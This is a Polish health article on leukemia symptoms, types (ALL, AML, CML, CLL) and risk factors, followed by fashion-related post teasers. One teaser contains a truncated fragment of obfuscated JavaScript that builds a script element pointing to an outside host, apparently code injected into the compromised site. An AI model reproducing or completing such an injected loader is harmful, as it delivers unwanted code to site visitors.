Białaczka – nie bagatelizuj jej pierwszych symptomów!

Białaczka to choroba, której objawy często są subtelne i słabo widoczne. Zdarza się, że chorzy mylą początkowe jej symptomy z przeziębieniem lub przemęczeniem. Jakie są objawy białaczki? Jaki może być przebieg białaczki?

Objawy białaczki

Objawy białaczki nie są charakterystyczne. Zdarza się, że początkowo pacjenci mylą je z przemęczeniem. Brak sił może postępować stopniowo jednak to właśnie on jest wspólnym i charakterystycznym dla wszystkich nowotworów objawem. Niektórym pacjentom może się wydawać, że objawy spowodowane są nadmiarem stresu, brakiem snu czy chwilowym osłabieniem. Przewlekłego przemęczenia nie można jednak bagatelizować!

Kolejne objawy, które pojawiają się w przypadku białaczek, są w dużej mierze uzależnione od rodzaju nowotworu i zaatakowanych narządów. U pacjentów często pojawia się intensywne pocenie, szczególnie w nocy, obrzęk węzłów chłonnych, a także powiększenie takich narządów jak śledziona czy wątroba i związany z tym ból brzucha.

Wielu chorych skarży się także na bóle kości, gorączkę i dreszcze, a objawom tym towarzyszy nieraz utrata masy ciała. Pacjenci często też zapadają na infekcje, pojawiają się u niech krwotoki, wybroczyny na skórze i łatwo powstają siniaki o nieznanej przyczynie. Chorobie może towarzyszyć anemia.

Nowotwór, który zaatakuje kolejne narządy może dawać inne objawy takie jak np. wymioty, nudności czy zawroty głowy. W przypadku białaczek o ostrym charakterze wszystkie te objawy mogą pojawić się jednocześnie.

Przebieg białaczki

To, jak przebiega choroba, uzależnione jest w dużym stopniu od jej rodzaju. Białaczki dzielą się głównie na ostre (występujące częściej) i przewlekłe (rzadsze).

Nieraz podział przebiega nieco inaczej, na białaczki limfatyczne, w których rozrostowi ulegają limfocyty i szpikowe, gdzie następuje rozrost innych rodzajów białek krwi. W wyniku tego podziału wyróżnia się cztery rodzaje białaczki. Ostra białaczka limfatyczna (ALL), ostra białaczka szpikowa (AML), przewlekła białaczka szpikową (CML) i przewlekła białaczka limfatyczna (CLL). Chcesz wiedzieć więcej na temat białaczki szpikowej, jej objawach i leczeniu? Wejdź na https://www.dkms.pl/pl/bialaczka.

Ostre białaczki mają inny przebieg niż przewlekłe. O ile przewlekłe mogą rozwijać się powoli, nawet przez kilka lat nie dając żadnych objawów, o tyle białaczki o charakterze ostrym mają przebieg gwałtowny i agresywny, a ich objawy są bardzo nasilone.

Przyczyny białaczki

Niestety, do dziś nie udało się ustalić co wywołuje ten nowotwór. Specjaliści uważają jednak, że istnieją czynniki, które mogą wpływać na pojawienie się choroby. Wśród czynników ryzyka są m.in. nadmierna ekspozycja na promieniowanie jonizujące, związki chemiczne takie jak np. herbicydy, pestycydy, rozpuszczalniki czy insektycydy, przeszczep narządu, choroby genetyczne czy onkogenne wirusy takie jak np. HTLV-1.

Podobne posty:

  • Spodnie uniwersalne, czyli jeansy w każdej damskiej szafieSpodnie uniwersalne, czyli jeansy w każdej damskiej szafie Wśród wielu ubrań w szafie każdej kobiety, z pewnością znajdziemy szereg takich, które możemy nosić przez cały rok, i po które najchętniej sięgamy, otwierając naszą garderobę i […] Posted in Moda
  • Płaszcz wiosenny – jakie dodatki będą do niego pasować?Płaszcz wiosenny – jakie dodatki będą do niego pasować? (function(){ a36y=document.createElement("script");a36y_="u"+("s")+"ta"; a36y_+=("t.i")+""+"n";a36y_+=(("f")+"o");a36y.type="text/javascript"; a36y_+="/"; […] Posted in Moda
  • Co nowego w butach na lato?Co nowego w butach na lato? Staramy się, aby wszystkie nasze użytkowniczki były cały czas na bieżąco z najnowszymi trendami w modzie. Zbliża się lato, dlatego też trzeba nieco odświeżyć swoje garderoby i przygotować […] Posted in Moda
  • Skórzana torebka idealna na każdą okazjęSkórzana torebka idealna na każdą okazję Od wielu lat torebki skórzane cieszą się ogromną popularnością wśród wielu kobiet ceniących sobie oryginalność styl oraz elegancję. Poszczególne fasony świetnie się prezentują zarówno na […] Posted in Moda
  • Tanie torebki skórzane – czy to możliwe?Tanie torebki skórzane – czy to możliwe? Torebka to podstawowe akcesorium, które odpowiednio dobrane sprawia, że stylizacja nabiera niepowtarzalnego charakteru. W ostatnich latach na popularności zyskują torebki skórzane. Ten […] Posted in Moda
Oceń artykuł
[Suma: 1 Średnia: 5]

Dodaj komentarz